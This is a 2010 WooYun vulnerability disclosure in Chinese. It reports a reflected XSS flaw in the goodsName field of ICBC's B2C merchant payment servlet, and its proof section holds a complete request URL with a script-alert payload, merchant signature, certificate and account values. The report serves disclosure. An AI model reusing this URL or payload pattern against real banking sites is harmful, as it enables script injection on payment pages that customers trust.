当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0888

漏洞标题:工商银行b2c商户支付存在XSS弱点

相关厂商:工商银行

漏洞作者: Liscker

提交时间:2010-11-30 10:48

修复时间:2010-11-30 11:04

公开时间:2010-11-30 11:04

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-11-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-11-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

工商银行b2c商户支付存在XSS弱点

详细说明:

goodsName存在XSS弱点
注意提交支付表单时间数据要在有效时间范围。

漏洞证明:

https://b2c.icbc.com.cn:443/servlet/ICBCINBSEBusinessServlet?merSignMsg=UwETHemn%2BZGtDXH1Shr1AhsuLznAGP6ze6%2F77rH4aKxtKezJ0PB1zEZrUXnD0wfrfQYPpOhJt7rQD6kb647jhNZgTYzXQTXcfAlhotA0w2ZSU5rS74%2B0iEqRiDmVxi49oyAh7OdEdkxCRbf8S6omNUyc89ZfRONrQubahnPZn3A%3D&merCert=MIICdDCCAd2gAwIBAgIKYULKEHrkACKn7jANBgkqhkiG9w0BAQUFADAnMQ8wDQYDVQQDEwZJY2JjQ0ExFDASBgNVBAoTC2ljYmMuY29tLmNuMB4XDTA5MTAxMDA2MjkzOFoXDTEwMTAxMDA2MjkzOFowPzEYMBYGA1UEAxMPeWVlcGF5MDEuZS40MDAwMQ0wCwYDVQQLEwQ0MDAwMRQwEgYDVQQKEwtpY2JjLmNvbS5jbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAvZa1tzLFf%2FRM9zSdy8nBoBNG0RI92Zdh0vplLlhPKiNwXFFtGuI0FGF9yD5CBZ6z2aH5piKQ15g%2F6vXmq4RoOsQAybA0e2FkE%2FHqYuDXZAlWgbKTKRFK9zW%2FR0OTxOQF2OSQIvaf1Q%2BYsoB%2BqqigzaHa5xdHhWPGLwvCooYskKsCAwEAAaOBjjCBizAfBgNVHSMEGDAWgBSnYiqG%2BrfWgZuFTNlkSGERswvHmjBJBgNVHR8EQjBAMD6gPKA6pDgwNjEQMA4GA1UEAxMHY3JsMjI3MjEMMAoGA1UECxMDY3JsMRQwEgYDVQQKEwtpY2JjLmNvbS5jbjAdBgNVHQ4EFgQUYDHjjT5kEx5CGbr34mwt7tubemowDQYJKoZIhvcNAQEFBQADgYEAhSHwxlCt3AYzO8O90bEHyPWtbucVOv%2FjTxKxFpaldRc20lkctKSOjSXpiy0%2FKTX4aJ7XC1QZO0pRTPjVxmlm%2BH64ZEFK23%2BgZQYX5EFKHJ8n6pMsVo%2Fg2YNRRm6lQtTqIU2dM1D9jV3Pxh5HmGtOwbXXKYTwE5GhPvaUI0x8xr8%3D&remark1=0&remark2=0&interfaceName=ICBC_PERBANK_B2C&interfaceVersion=1.0.0.0&orderid=352999184&amount=1232300&curType=001&merID=4000EC23359695&merAcct=4000021129200895575&verifyJoinFlag=0&notifyType=HS&merURL=http%3A%2F%2Fbank.test.com&resultType=0&orderDate=20100921153305&goodsName=%3Cscript%3Ealert%28/1980/%29%3C/script%3E

修复方案:

过滤

版权声明:转载请注明来源 Liscker@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)


漏洞评价:

评论